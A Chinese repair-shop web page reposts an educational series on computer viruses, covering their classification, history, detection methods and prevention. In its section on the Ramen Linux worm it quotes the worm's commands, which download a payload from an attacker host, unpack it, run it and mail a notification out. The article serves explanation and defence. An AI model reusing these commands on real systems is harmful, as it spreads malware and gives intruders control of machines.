网站首页
公司简介
故障集锦
服务承诺
联想故障问答
联系方式
在线咨询
联想客服①:
联想客服②:
电话:029-86478250
手机:18091827513
计算机病毒的故事
计算机病毒的定义
计算机病毒(Computer Virus)在 《中华人民共和国计算机信息系统安全保护条例》中被明确定义为:"指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码"。
计算机病毒的特点
人为的特制程序,具有自我复制能力,很强的感染性,一定的潜伏性,特定的触发性,很大的破坏性。
病毒存在的必然性
计算机的信息需要存取,复制,传送,病毒作为信息的一种形式可以随之繁殖,感染,破坏.并且,当病毒取得控制权之后,他们会主动寻找感染目标,使自己广为流传。
计算机病毒的长期性
计算机操作系统的弱点往往是被病毒利用,提高系统的安全性是防病毒的一个重要方面,但完美的系统是不存在的。提高一定的安全性将使系统多数时间用于病毒检查,系统失去了可用性与实用性,另一方面,信息保密的要求让人在泄密和抓住病毒之间无法选择。
这样,病毒与反病毒将成为一个长期的技术对抗。病毒主要由反病毒软件来对付,而且反病毒技术将成为一种长期的科研做下去。
计算机病毒的产生
病毒不是来源于突发或偶然的原因。
突发的停电和偶然的错误,会在计算机的磁盘和内存中产生一些乱码和随机指令,但这些代码是无序和混乱的。病毒则是一种比较完美的,精巧严谨的代码,按照严格的秩序组织起来,与所在的系统网络环境相适应和配合起来,病毒不会通过偶然形成,并且需要有一定的长度,这个基本的长度从概率上来讲是不可能通过随机代码产生的。
病毒是人为的特制程序
现在流行的病毒是由人为故意编写的,多数病毒可以找到作者信息和产地信息,通过大量的资料分析统计来看,病毒作者主要情况和目的是:一些天才的程序员为了表现自己和证明自己的能力,处于对上司的不满,为了好奇,为了报复,为了祝贺和求爱,为了得到控制口令,为了软件拿不到报酬预留的陷阱等。当然也有因政治,军事,宗教,民族。专利等方面的需求而专门编写的,其中也包括一些病毒研究机构和黑客的测试病毒。
计算机病毒小知识速查系列二
>
计算机病毒分类
根据多年对计算机病毒的研究,按照科学的,系统的,严密的方法,计算机病毒可分类如下:
按照计算机病毒属性的分类
1、病毒存在的媒体
根据病毒存在的媒体,病毒可以划分为网络病毒,文件病毒,引导型病毒。
网络病毒通过计算机网络传播感染网络中的可执行文件,文件病毒感染计算机中的文件(如:COM,EXE,DOC等),引导型病毒感染启动扇区(Boot)和硬盘的系统引导扇区(MBR),还有这三种情况的混合型,例如:多型病毒(文件和引导型)感染文件和引导扇区两种目标,这样的病毒通常都具有复杂的算法,它们使用非常规的办法侵入系统,同时使用了加密和变形算法。
2、病毒传染的方法
3、病毒破坏的能力
根据病毒破坏的能力可划分为以下几种:
无害型:除了传染时减少磁盘的可用空间外,对系统没有其它影响。
无危险型:这类病毒仅仅是减少内存、显示图像、发出声音及同类音响。
危险型:这类病毒在计算机系统操作中造成严重的错误。
非常危险型:这类病毒删除程序、破坏数据、清除系统内存区和操作系统中重要的信息。
这些病毒对系统造成的危害,并不是本身的算法中存在危险的调用,而是当它们传染时会引起无法预料的和灾难性的破坏。由病毒引起其它的程序产生的错误也会破坏文件和扇区,这些病毒也按照他们引起的破坏能力划分。一些现在的无害型病毒也可能会对新版的DOS、Windows和其它操作系统造成破坏。例如:在早期的病毒中,有一个"Denzuk"病毒在360K磁盘上很好的工作,不会造成任何破坏,但是在后来的高密度软盘上却能引起大量的数据丢失。
4、病毒特有的算法
根据病毒特有的算法,病毒可以划分为:
伴随型病毒:这一类病毒并不改变文件本身,它们根据算法产生EXE文件的伴随体,具有同样的名字和不同的扩展名(COM),例如:XCOPY.EXE的伴随体是XCOPY.COM。病毒把自身写入COM文件并不改变EXE文件,当DOS加载文件时,伴随体优先被执行到,再由伴随体加载执行原来的EXE文件。
"蠕虫"型病毒:通过计算机网络传播,不改变文件和资料信息,利用网络从一台机器的内存传播到其它机器的内存,计算网络地址,将自身的病毒通过网络发送。有时它们在系统存在,一般除了内存不占用其它资源。
寄生型病毒:除了伴随和"蠕虫"型,其它病毒均可称为寄生型病毒,它们依附在系统的引导扇区或文件中,通过系统的功能进行传播,按算法分为:
练习型病毒:病毒自身包含错误,不能进行很好的传播,例如一些病毒在调试阶段。
诡秘型病毒:它们一般不直接修改DOS中断和扇区数据,而是通过设备技术和文件缓冲区等DOS内部修改,不易看到资源,使用比较高级的技术。利用DOS空闲的数据区进行工作。
变型病毒(又称幽灵病毒):这一类病毒使用一个复杂的算法,使自己每传播一份都具有不同的内容和长度。它们一般的作法是一段混有无关指令的解码算法和被变化过的病毒体组成。
计算机病毒小知识速查系列三
>
计算机病毒的发展
在病毒的发展史上,病毒的出现是有规律的,一般情况下一种新的病毒技术出现后,病毒迅速发展,接着反病毒技术的发展会抑制其流传。操作系统进行升级时,病毒也会调整为新的方式,产生新的病毒技术。它可划分为:
1、DOS引导阶段
1987年,计算机病毒主要是引导型病毒,具有代表性的是"小球"和"石头"病毒。
当时得计算机硬件较少,功能简单,一般需要通过软盘启动后使用。引导型病毒利用软盘得启动原理工作,它们修改系统启动扇区,在计算机启动时首先取得控制权,减少系统内存,修改磁盘读写中断,影响系统工作效率,在系统存取磁盘时进行传播。1989年,引导型病毒发展为可以感染硬盘,典型的代表有"石头2"。
2、DOS可执行阶段
1989年,可执行文件型病毒出现,它们利用DOS系统加载执行文件的机制工作,代表为"耶路撒冷","星期天"病毒,病毒代码在系统执行文件时取得控制权,修改DOS中断,在系统调用时进行传染,并将自己附加在可执行文件中,使文件长度增加。1990年,发展为复合型病毒,可感染COM和EXE文件。
3、伴随、批次型阶段
1992年,伴随型病毒出现,它们利用DOS加载文件的优先顺序进行工作。具有代表性的是"金蝉"病毒,它感染EXE文件时生成一个和EXE同名的扩展名为COM伴随体;它感染COM文件时,改为原来的COM文件为同名的EXE文件,在产生一个原名的伴随体,文件扩展名为COM。这样,在DOS加载文件时,病毒就取得控制权。这类病毒的特点是不改变原来的文件内容,日期及属性,解除病毒时只要将其伴随体删除即可。在非DOS操作系统中,一些伴随型病毒利用操作系统的描述语言进行工作,具有典型代表的是"海盗旗"病毒,它在得到执行时,询问用户名称和口令,然后返回一个出错信息,将自身删除。批次型病毒是工作在DOS下的和"海盗旗"病毒类似的一类病毒。
4、幽灵、多形阶段
1994年,随着汇编语言的发展,实现同一功能可以用不同的方式进行完成,这些方式的组合使一段看似随机的代码产生相同的运算结果。幽灵病毒就是利用这个特点,每感染一次就产生不同的代码。例如"一半"病毒就是产生一段有上亿种可能的解码运算程序,病毒体被隐藏在解码前的数据中,查解这类病毒就必须能对这段数据进行解码,加大了查毒的难度。多形型病毒是一种综合性病毒,它既能感染引导区又能感染程序区,多数具有解码算法,一种病毒往往要两段以上的子程序方能解除。
5、生成器、变体机阶段
1995年,在汇编语言中,一些数据的运算放在不同的通用寄存器中,可运算出同样的结果,随机的插入一些空操作和无关指令,也不影响运算的结果,这样,一段解码算法就可以由生成器生成。当生成的是病毒时,这种复杂的称之为病毒生成器和变体机就产生了。具有典型代表的是"病毒制造机"VCL,它可以在瞬间制造出成千上万种不同的病毒,查解时就不能使用传统的特征识别法,需要在宏观上分析指令,解码后查解病毒。变体机就是增加解码复杂程度的指令生成机制。
6、网络、蠕虫阶段
1995年,随着网络的普及,病毒开始利用网络进行传播,它们只是以上几代病毒的改进。在非DOS操作系统中,"蠕虫"是典型的代表,它不占用除内存以外的任何资源,不修改磁盘文件,利用网络功能搜索网络地址,将自身向下一地址进行传播,有时也在网络服务器和启动文件中存在。
7、视窗阶段
1996年,随着Windows和Windows95的日益普及,利用Windows进行工作的病毒开始发展,它们修改(NE,PE)文件,典型的代表是DS.3873,这类病毒的急智更为复杂,它们利用保护模式和API调用接口工作,解除方法也比较复杂。
8、宏病毒阶段
1996年,随着Windows Word功能的增强,使用Word宏语言也可以编制病毒,这种病毒使用类Basic语言,编写容易,感染Word文档文件。在Excel和AmiPro出现的相同工作机制的病毒也归为此类。由于Word文档格式没有公开,这类病毒查解比较困难。
9、互连网阶段
1997年,随着因特网的发展,各种病毒也开始利用因特网进行传播,一些携带病毒的数据包和邮件越来越多,如果不小心打开了这些邮件,机器就有可能中毒。
10 Java、邮件炸弹阶段
1997年,随着万维网上Java的普及,利用Java语言进行传播和资料获取的病毒开始出现,典型的代表是JavaSnake病毒。还有一些利用邮件服务器进行传播和破坏的病毒,例如Mail-Bomb病毒,它就严重影响因特网的效率。
计算机病毒小知识速查系列四
计算机病毒的危害性
1988年11月2日下午5时1分59秒,美国康奈尔大学的计算机科学系研究生,23岁的莫里斯(Morris)将其编写的蠕虫程序输入计算机网络。在几小时内导致因特网堵塞。这个网络连接着大学、研究机关的155000台计算机,使网络堵塞,运行迟缓。这件事就像是计算机界的一次大地震,引起了巨大反响,震惊全世界,引起了人们对计算机病毒的恐慌,也使更多的计算机专家重视和致力于计算机病毒研究。1988年下半年,我国在统计局系统首次发现了"小球"病毒,它对统计系统影响极大。最近的CIH病毒,美丽杀病毒等等都在全世界范围内造成了很大的经济和社会损失。
可以看到,随着计算机和因特网的日益普及,计算机病毒和崩溃,重要数据遭到破坏和丢失,会造成社会财富的巨大浪费,甚至会造成全人类的灾难。
国内外防毒行业发展
随着计算机技术发展得越来越快,使得计算机病毒技术与计算机反病毒技术的对抗也越来越尖锐。据统计,现在基本上每天都要出现几十种新病毒,其中很多病毒的破坏性都非常大,稍有不慎,就会给计算机用户造成严重后果。下面我们以介绍国内防毒行业的发展为主。
我国计算机反病毒技术的研究和发展,是从研制防病毒卡开始的。防病毒卡的核心实际上是一个软件,只不过将其固化在ROM中。它的出发点是想以不变应万变,通过动态驻留内存来监视计算机的运行情况,根据总结出来的病毒行为规则和经验来判断是否有病毒活动,通过截获中断控制权规则和经验来判定是否有病毒活动,并可以截获中断控制权来使内存中的病毒瘫痪,使其失去传染别的文件和破坏信息资料的能力,这就是防病毒卡"带毒运行"功能的基本原理。防病毒卡主要的不足是与正常软件特别是国产的软件有不兼容的现象,误报、漏报病毒现象时有发生,降低了计算机运行速度,升级困难等。从防病毒技术上说是不成熟的,病毒知变万化,技术手段越来越高,企图以一种不变的技术对付病毒是不可能的。防病毒卡的动态监测技术、病毒行为规则的研究,对于发现计算机病毒起了很大的作用,这些技术是防病毒卡换精华。但是作为一个产品,只有这部分技术是远远不够的,这部分技术也没有太大的实际意义,所以防病毒卡的使用者在减少。
随着防病毒卡的衰落,解病毒软件则日益风行。解病毒软件最重要的功能是将病毒彻底干净地予以清除,如果说防病毒卡是治标的话,那么解病毒软件则是治本。
第一代反病毒技术是采取单纯的病毒特征判断,将病毒从带毒文件中清除掉。这种方式可以准确地清除病毒,可靠性很高。后来病毒技术发展了,特别是加密和变形技术的运用,使得这种简单的静态扫描方式失去了作用。随之而来的反病毒技术也发展了一步。
第二代反病毒技术是采用静态广谱特征扫描方法检测病毒,这种方式可以更多地检测出变形病毒,但另一方面误报率也提高,尤其是用这种不严格的特征判定方式去清除病毒带来的风险性很大,容易造成文件和数据的破坏。所以说静态防病毒技术也有难以克服的缺陷。
第三代反病毒技术的主要特点是将静态扫描技术和动态仿真跟踪技术结合起来,将查找病毒和清除病毒合二为一,形成一个整体解决方案,能够全面实现防、查、消等反病毒所必备的各种手段,以驻留内存方式防止病毒的入侵,凡是检测到的病毒都能清除,不会破坏文件和数据。随着病毒数量的增加和新型病毒技术的发展,静态扫描技术将会使查毒软件速度降低,驻留内存防毒模块容易产生误报。
第四代反病毒技术则是针对计算机病毒的发展而基于病毒家族体系的命名规则、基于多位CRC校验和扫描机理,启发式智能代码分析模块、动态数据还原模块(能查出隐蔽性极强的压缩加密文件中的病毒)、内存解毒模块、自身免疫模块等先进的解毒技术,较好的解决了以前防毒技术顾此失彼、此消彼长的状态。
计算机病毒小知识速查系列五
病毒检测的方法
在与病毒的对抗中,及早发现病毒很重要。早发现,早处置,可以减少损失。检测病毒方法有:特征代码法、校验和法、行为监测法、软件模拟法, 这些方法依据的原理不同,实现时所需开销不同,检测范围不同,各有所长。
特征代码法
特征代码法被早期应用于SCAN、CPAV等著名病毒检测工具中。国外专家认为特征代码法是检测已知病毒的最简单、开销最小的方法。
特征代码法的实现步骤如下:
采集已知病毒样本,病毒如果既感染COM文件,又感染EXE文件,对这种病毒要同时采集COM型病毒样本和EXE型病毒样本。
在病毒样本中,抽取特征代码。依据如下原则:
抽取的代码比较特殊,不大可能与普通正常程序代码吻合。抽取的代码要有适当长度,一方面维持特征代码的唯一性,另一方面又不要有太大的空间与时间的开销。如果一种病毒的特征代码增长一字节,要检测3000种病毒,增加的空间就是3000字节。在保持唯一性的前提下,尽量使特征代码长度短些,以减少空间与时间开销。
在既感染COM文件又感染EXE文件的病毒样本中,要抽取两种样本共有的代码。将特征代码纳入病毒数据库。
打开被检测文件,在文件中搜索,检查文件中是否含有病毒数据库中的病毒特征代码。如果发现病毒特征代码,由于特征代码与病毒一一对应,便可以断定,被查文件中患有何种病毒。
采用病毒特征代码法的检测工具,面对不断出现的新病毒,必须不断更新版本,否则检测工具便会老化,逐渐失去实用价值。病毒特征代码法对从未见过的新病毒,自然无法知道其特征代码,因而无法去检测这些新病毒。
特征代码法的优点是:检测准确快速、可识别病毒的名称、误报警率低、依据检测结果,可做解毒处理。其缺点是:不能检测未知病毒、搜集已知病毒的特征代码,费用开销大、在网络上效率低(在网络服务器上,因长时间检索会使整个网络性能变坏)。
其特点:
A.速度慢。随着病毒种类的增多,检索时间变长。如果检索5000种病毒,必须对5000个病毒特征代码逐一检查。如果病毒种数再增加,检病毒的时间开销就变得十分可观。此类工具检测的高速性,将变得日益困难。
B.误报警率低。
非C.不能检查多形性病毒。特征代码法是不可能检测多态性病毒的。国外专家认为多态性病毒是病毒特征代码法的索命者。
D.不能对付隐蔽性病毒。隐蔽性病毒如果先进驻内存,后运行病毒检测工具,隐蔽性病毒能先于检测工具,将被查文件中的病毒代码剥去,检测工具的确是在检查一个虚假的"好文件",而不能报警,被隐蔽性病毒所蒙骗。
校验和法
将正常文件的内容,计算其校验和,将该校验和写入文件中或写入别的文件中保存。在文件使用过程中,定期地或每次使用文件前,检查文件现在内容算出的校验和与原来保存的校验和是否一致,因而可以发现文件是否感染,这种方法叫校验和法,它既可发现已知病毒又可发现未知病毒。在SCAN和CPAV工具的后期版本中除了病毒特征代码法之外,还纳入校验和法,以提高其检测能力。
这种方法既能发现已知病毒,也能发现未知病毒,但是,它不能识别病毒类,不能报出病毒名称。由于病毒感染并非文件内容改变的唯一的非他性原因,文件内容的改变有可能是正常程序引起的,所以校验和法常常误报警。而且此种方法也会影响文件的运行速度。
病毒感染的确会引起文件内容变化,但是校验和法对文件内容的变化太敏感,又不能区分正常程序引起的变动,而频繁报警。用监视文件的校验和来检测病毒,不是最好的方法。
这种方法遇到下述情况:已有软件版更新、变更口令、修改运行参数、校验和法都会误报警。
校验和法对隐蔽性病毒无效。隐蔽性病毒进驻内存后,会自动剥去染毒程序中的病毒代码,使校验和法受骗,对一个有毒文件算出正常校验和。
运用校验和法查病毒采用三种方式:
①在检测病毒工具中纳入校验和法,对被查的对象文件计算其正常状态的校验和,将校验和值写入被查文件中或检测工具中,而后进行比较。
②在应用程序中,放入校验和法自我检查功能,将文件正常状态的校验和写入文件本身中,每当应用程序启动时,比较现行校验和与原校验和值。实现应用程序的自检测。
③将校验和检查程序常驻内存,每当应用程序开始运行时,自动比较检查应用程序内部或别的文件中预先保存的校验和。
校验和法的优点是:方法简单能发现未知病毒、被查文件的细微变化也能发现。其缺点是:发布通行记录正常态的校验和、会误报警、不能识别病毒名称、不能对付隐蔽型病毒。
行为监测法
利用病毒的特有行为特征性来监测病毒的方法,称为行为监测法。通过对病毒多年的观察、研究,有一些行为是病毒的共同行为,而且比较特殊。在正常程序中,这些行为比较罕见。当程序运行时,监视其行为,如果发现了病毒行为,立即报警。
这些做为监测病毒的行为特征如下:
A.占有INT 13H
所有的引导型病毒,都攻击Boot扇区或主引导扇区。系统启动时,当Boot扇区或主引导扇区获得执行权时,系统刚刚开工。一般引导型病毒都会占用INT 13H功能,因为其他系统功能未设置好,无法利用。引导型病毒占据INT 13H功能,在其中放置病毒所需的代码。
B.改DOS系统为数据区的内存总量
病毒常驻内存后,为了防止DOS系统将其覆盖,必须修改系统内存总量。
C.对COM、EXE文件做写入动作
病毒要感染,必须写COM、EXE文件。
D.病毒程序与宿主程序的切换
染毒程序运行中,先运行病毒,而后执行宿主程序。在两者切换时,有许多特征行为。
行为监测法的长处:可发现未知病毒、可相当准确地预报未知的多数病毒。行为监测法的短处:可能误报警、不能识别病毒名称、实现时有一定难度。
软件模拟法
多态性病毒每次感染都变化其病毒密码,对付这种病毒,特征代码法失效。因为多态性病毒代码实施密码化,而且每次所用密钥不同,把染毒的病毒代码相互比较,也无法找出相同的可能做为特征的稳定代码。虽然行为检测法可以检测多态性病毒,但是在检测出病毒后,因为不知病毒的种类,难于做消毒处理。
计算机病毒小知识速查系列六
计算机病毒的破坏行为
计算机病毒的破坏行为体现了病毒的杀伤能力。病毒破坏行为的激烈程度取决于病毒作者的主观愿望和他所具有的技术能量。数以万计、不断发展扩张的病毒,其破坏行为千奇百怪,不可能穷举其破坏行为,难以做全面的描述。根据有的病毒资料可以把病毒的破坏目标和攻击部位归纳如下:
1.攻击系统数据区,攻击部位包括:
硬盘主引寻扇区、Boot扇区、FAT表、文件目录。一般来说,攻击系统数据区的病毒是恶性病毒,受损的数据不易恢复。
2.攻击文件
病毒对文件的攻击方式很多,可列举如下:删除、改名、替换内容、丢失部分程序代码、内容颠倒、写入时间空白、变碎片、假冒文件、丢失文件簇、丢失数据文件。
3.攻击内存
内存是计算机的重要资源,也是病毒的攻击目标。病毒额外地占用和消耗系统的内存资源,可以导致一些大程序受阻。病毒攻击内存的方式如下:占用大量内存、改变内存总量、禁止分配内存、蚕食内存。
4.干扰系统运行
病毒会干扰系统的正常运行,以此做为自己的破坏行为。此类行为也是花样繁多,可以列举下述诸方式:不执行命令、干扰内部命令的执行、虚假报警、打不开文件、内部栈溢出、占用特殊数据区、换现行盘、时钟倒转、重启动、死机、强制游戏、扰乱串并行口。
5.速度下降
病毒激活时,其内部的时间延迟程序启动。在时钟中纳入了时间的循环计数,迫使计算机空转,计算机速度明显下降。
6.攻击磁盘
攻击磁盘数据、不写盘、写操作变读操作、写盘时丢字节。
7.扰乱屏幕显示
病毒扰乱屏幕显示的方式很多,可列举如下:字符跌落、环绕、倒置、显示前一屏、光标下跌、滚屏、抖动、乱写、吃字符。
8.键盘
病毒干扰键盘操作,已发现有下述方式:响铃、封锁键盘、换字、抹掉缓存区字符、重复、输入紊乱。
9.喇叭
许多病毒运行时,会使计算机的喇叭发出响声。有的病毒作者让病毒演奏旋律优美的世界名曲,在高雅的曲调中去杀戮人们的信息财富。有的病毒作者通过喇叭发出种种声音。已发现的有以下方式:演奏曲子、警笛声、炸弹噪声、鸣叫、咔咔声、嘀嗒声
10.攻击CMOS
在机器的CMOS区中,保存着系统的重要数据。例如系统时钟、磁盘类型、内存容量等,并具有校验和。有的病毒激活时,能够对CMOS区进行写入动作,破坏系统CMOS中的数据。
11.干扰打印机
假报警、间断性打印、更换字符。
计算机病毒小知识速查系列七
计算机病毒的防治策略
计算机病毒的防治要从防毒、查毒、解毒三方面来进行;系统对于计算机病毒的实际防治能力和效果也要从防毒能力、查毒能力和解毒能力三方面来评判。
"防毒"是指根据系统特性,采取相应的系统安全措施预防病毒侵入计算机。"查毒"是指对于确定的环境,能够准确地报出病毒名称,该环境包括,内存、文件、引导区(含主导区)、网络等。"解毒"是指根据不同类型病毒对感染对象的修改,并按照病毒的感染特性所进行的恢复。该恢复过程不能破坏未被病毒修改的内容。感染对象包括:内存、引导区(含主引导区)、可执行文件、文档文件、网络等。
防毒能力是指预防病毒侵入计算机系统的能力。通过采取防毒措施,应可以准确地、实时地监测预警经由光盘、软盘、硬盘不同目录之间、局域网、因特网(包括FTP方式、E-MAIL、HTTP方式)或其它形式的文件下载等多种方式进行的传输;能够在病毒侵入系统是发出警报,记录携带病毒的文件,即时清除其中的病毒;对网络而言,能够向网络管理员发送关于病毒入侵的信息,记录病毒入侵的工作站,必要时还要能够注销工作站,隔离病毒源。
查毒能力是指发现和追踪病毒来源的能力。通过查毒应该能准确地发现计算机系统是否感染有病毒,并准确查找出病毒的来源,并能给出统计报告;查解病毒的能力应由查毒率和误报率来评判。
解毒能力是指从感染对象中清除病毒,恢复被病毒感染前的原始信息的能力;解毒能力应用解毒率来评判。
计算机病毒小知识速查系列八
Ramen是Linux的“病”而非“毒”
前一段时间,一些媒体报告:“世界上第一个Linux病毒Reman已经出现”。这引起我极大的兴趣,并想一睹Reman的庐山真面目。但是,当我得到该病毒的有关资料和样本之后发现:Reman并不能严格地称为病毒,它实际上只是一个古老的、在Unix/Linux世界早已存在的“缓冲区溢出”攻击程序。几乎所有Unix/Linux版本中都或多或少地存在这样的问题。第一次此种类型的攻击(Morris Worm)是在十多年前,Reman这种“缓冲区溢出”攻击程序并不是在今天的世界第一次出现。事实上,针对Windows98/NT的缓冲区溢出攻击也是很常见的,且并不被称为病毒。
缓冲区溢出的原理是:向一个有限空间的缓冲区拷贝了过长的字符串,覆盖相邻的存储单元,从而引起程序运行失败。因为自动变量保存在堆栈当中,当发生缓冲区溢出的时候,存储在堆栈中的函数返回地址也会被覆盖,从而无法从发生溢出的函数正常返回(返回地址往往是一个无效的地址)。在这样的情况下,系统一般报告:“core dump”或 “segment fault”。严重的情况是:如果覆盖缓冲区的是一段精心设计的机器指令序列,它可能通过溢出,改变返回地址,将其指向自己的指令序列,从而改变该程序的正常流程。这段精心设计的指令一般的目的是:“/bin/sh”,所以这段代码被称为“shell code”。通过这样的溢出可以得到一个shell,仅此而已。但是,如果被溢出是一个suid root程序,得到的将是一个root shell。这样,机器的控制权已经易手,此后发生的任何事情都是合理的。
下面我们回到Reman。它首先对网络上的主机进行扫描,通过两个普通的漏洞进入系统,获取root权限,然后从源主机复制自身,以继续扫描网上其他服务器。对于Red Hat 6.2 来讲,如果攻击成功,它会做以下工作:
mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
cp ramen。tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen。tar;./start.sh
echo Eat Your Ramen! | mail -s TOADDR -c gb31337@hotmail.com gb31337@yahoo.com
很明显,Reman只是一个自动化了的缓冲区溢出程序,而且是很普通的一种。目前缓冲区溢出攻击是非常普遍的一种攻击。黑客网站对各类系统的漏洞的发布几乎每日更新。这种攻击方式并不是不可避免,目前已有很多对付该类攻击的方案。需要指出的是:Reman这样的攻击程序对红旗Linux的攻击是不可能成功的,因为红旗Linux全线产品都考虑了“缓冲区溢出”这样的安全问题。
计算机病毒小知识速查系列九
专家谈计算机病毒高发季节的防护
4月是计算机病毒的高发季节。通过网络新途径,病毒早已突破了地域界限,飞速传播,预计本月有至少20余种电脑病毒将向我们的电脑发起猛攻,其中尤以4月26日的CIH病毒最为险恶。
八大“前兆”
“计算机‘发病’也有预兆,及早注意完全可以避免。”上海市信息办信息安全专家石坚提醒市民注意以下八大“前兆”:计算机经常性出现无缘无故的死机;计算机系统无法正常启动或启动变慢;键盘、显示有异常现象;运行速度明显变慢;以前能正常运行的软件经常发生内存不足的错误;文件的长度、内容、属性和日期等无故改变;经常丢失文件、丢失数据;自动链接到一些陌生网站。“当出现上述情况时,说明您的计算机很可能已经感染了病毒。”“临床”病征石坚还列出了病毒发作时的病症:如“胡言乱语”——提示一些不相干的话,发出一段音乐,产生特定的图像,硬盘灯不断闪烁;“胡搅蛮缠”——突然进行游戏算法,鼠标自己在动,Windows桌面图标乱动,系统自动发送电子邮件。“病情”严重时计算机还会突然死机或重新启动。
预防“接种”
市计算机病毒防范服务中心82000热线的专家专为电脑用户开出了春季预防“药方”,共计8味“良药”:个人计算机乃至整个网络都应安装实时防病毒软件,以建立完整的网络防毒架构;及时更新杀毒软件;不要打开任何附件后缀为VBS、CHM、PIF、SCR、SHS的文件,对附件后缀为EXE与COM的文件应先确认再打开;来历不明的邮件最好删除或先用防病毒软件检查;不要隐藏系统中已知文件类型的扩展名;所有主题有“FW:”的信件都要提高警惕;重要资料应作好备份;用户应使用最新版的OutlookExpress安全修补程序或将浏览器设成最高安全性。专家还欢迎市民带着问题参加本周六在上海图书馆知识广场举行的大型咨询活动。
计算机病毒小知识速查系列十
及时升级反病毒软件的利器
目前有许多电脑病毒发作特点不是快速而猛烈的,而是缓慢而狡猾的,有时还具有使用加密插件自动升级的能力,反病毒专家认为这些发作缓慢的病毒有非同寻常的驻留本领,一旦发作将对计算机更加危险。正是由于病毒的日益增多,因此反病毒软件也得到了大家的欢迎。但现在的病毒能够自动地不断升级,这就要求我们必须及时地对反病毒软件进行升级发展,只有这样才能使计算机更加安全地使用。但对反病毒软件进行升级也不是一件很容易的事情,除了要确保它的时效性外,我们还必须考虑到完成该工作所要的时间,以及由此带来的潜在的危险等因素,因为一点点的时间误差就可能给自己的计算机造成难以弥补的损失。那么我们该如何才能及时准确地升级反病毒软件呢?下面笔者就以McAfee系列的反病毒软件为例,和大家谈谈使用McAfee的ePo策略来在工作中及时完成对反病毒软件的升级工作。
McAfee ePo是英文McAfee ePolicy Orchestrator的缩写,它是一个与McAfee反病毒软件结合比较紧密的综合型管理工具,该工具一般具有智能组织用户、策略的实时变化、增强的报告、安全的策略管理以及无缝升级反病毒软件等特征,它可以帮助我们及时完成反病毒软件的分配工作,该项功能可以使我们这些普通的网民省却了购买或寻找第三方软件的麻烦,同样也会降低工作中可能存在的安装和升级的复杂性,更重要的一点就是ePo还可以与市面上流行的第三方软件分配工具进行高效协调地工作,另外ePo还能够监控并且改变用户机器的配置,获得状态和事件的增强报告,追踪病毒感染率和纠正行动。
对于我们远程用户来说,由于ePo是通过安全的http协议进行通信的,这样我们就可以通过因特网或者本地的局域网来远程管理自己的计算机系统,管理时,我们首先与ePo服务器建立连接,一旦与服务器连接成功后,ePo代理会自动连接到服务器并把自上一次通信以来所收集到的所有存储在本地的信息传送到服务器上。另外ePo设计合理的体系结构使得一台ePo服务器能够管理另外的一台和多台ePo服务器,这为ePo生成分组分级的报告打下了良好的基础,同时ePo还具备26个预设报告和无限的定置报告能力,这使得生成的数据报告具有很强的数据加工能力,比起其他软件的记流水帐的做法要强多了。如果病毒发作,ePo能将所有的McAfee反病毒软件设定为全企业的自动更新,启动一个手动扫描,并生成详细报告来查明侵入地点以及确认传播的方式和速度;当然ePo最受用户欢迎的是它支持在线自动更新,利用该功能我们可以花最少的钱和时间来获取及时地升级反病毒软件。
计算机病毒小知识速查系列十一
合理搭配使用杀病毒软件
面对如今层出不穷的各类杀毒软件,恐怕不单是“菜鸟”们找不着北,连一些“老鸟”也颇感头痛。由于个人机器的性能、用途、习惯、兴趣甚至心态的不同,形成了自己的应用软件搭配风格,但几乎很少有朋友注意到这其中的技巧。
一、使用杀毒软件的几个误区
很多朋友认为自己的机器里头装了杀毒软件就万事大吉。其实到目前为止,世界上没有一家杀毒软件生产商敢承诺可以查杀所有已知病毒,这就意味着即便你装了杀毒软件,绝非从此就高枕无忧。我所见到的装备了杀毒软件的机器仍然被病毒侵蚀的案例不下10起。所以,在大家防范于未然的同时,合理搭配使用杀毒软件也是必不可少的。 为数不少的朋友总是喜欢下载一大堆最新的却是连自己也不知道如何用的共享杀毒软件,甚至装了又删--直接后果是造成系统和其中某些程序产生冲突,有使系统崩溃的危险;注册表也因此会凌乱、臃肿;系统文件有可能被误删等,威胁着整个系统的安全。
西安联想维修站具体乘车线路:
电话:029-86478250 18091827513
地址:西安市未央区凤城二路天地时代广场B座2602室(市图书
馆旁边,地铁二号线图书馆D出口)
公交:图书馆站117路; 202路; 207路; 209路; 227路;
228路; 230路; 230路区间; 236路; 238路; ;266路; 267路等
雅荷花园站:1路; 18路; 37路; 38路; 39路; 117路; 202路等
经济开发区站:263路
西安联想笔记本维修故障集锦
维修博客
推荐阅读:
1. 联想笔记本(Insyde H2o类型)如何设置
2. 联想笔记本(Insyde H2o类型)如何设置
3. 笔记本摄像头为灰色并有反斜杠或全
4. 笔记本摄像头为灰色并有反斜杠或全
5. 笔记本摄像头为灰色并有反斜杠或全
6. Idea系列笔记本BIOS Setup的设置方法
7. 联想昭阳、扬天笔记本如何设置、修
8. Nvidia更新驱动提示“无法连接到Nvid
9. Nvidia更新驱动提示“无法连接到Nvid
10. 标配NVIDIA双显卡笔记本机型的双显卡
11. 观看优酷、腾讯等网络视频时出现画
12. 计算机病毒的故事
13. 显示器偏色或变色
14. 通过网站在线播放视频出现绿屏、花
15. Windows 10系统下本地打印机无法打印的
16. Windows 10系统下本地打印机无法打印的
17. 2019款拯救者Y7000/Y7000P玩游戏无法使用
18. 系统重置后键盘失灵临时解决方案
19. 2019款拯救者Y7000 Y7000P音频有杂音?
20. 新购电脑首次开机注意事项
21. Lenovo SMB 笔记本如何设置BIOS密码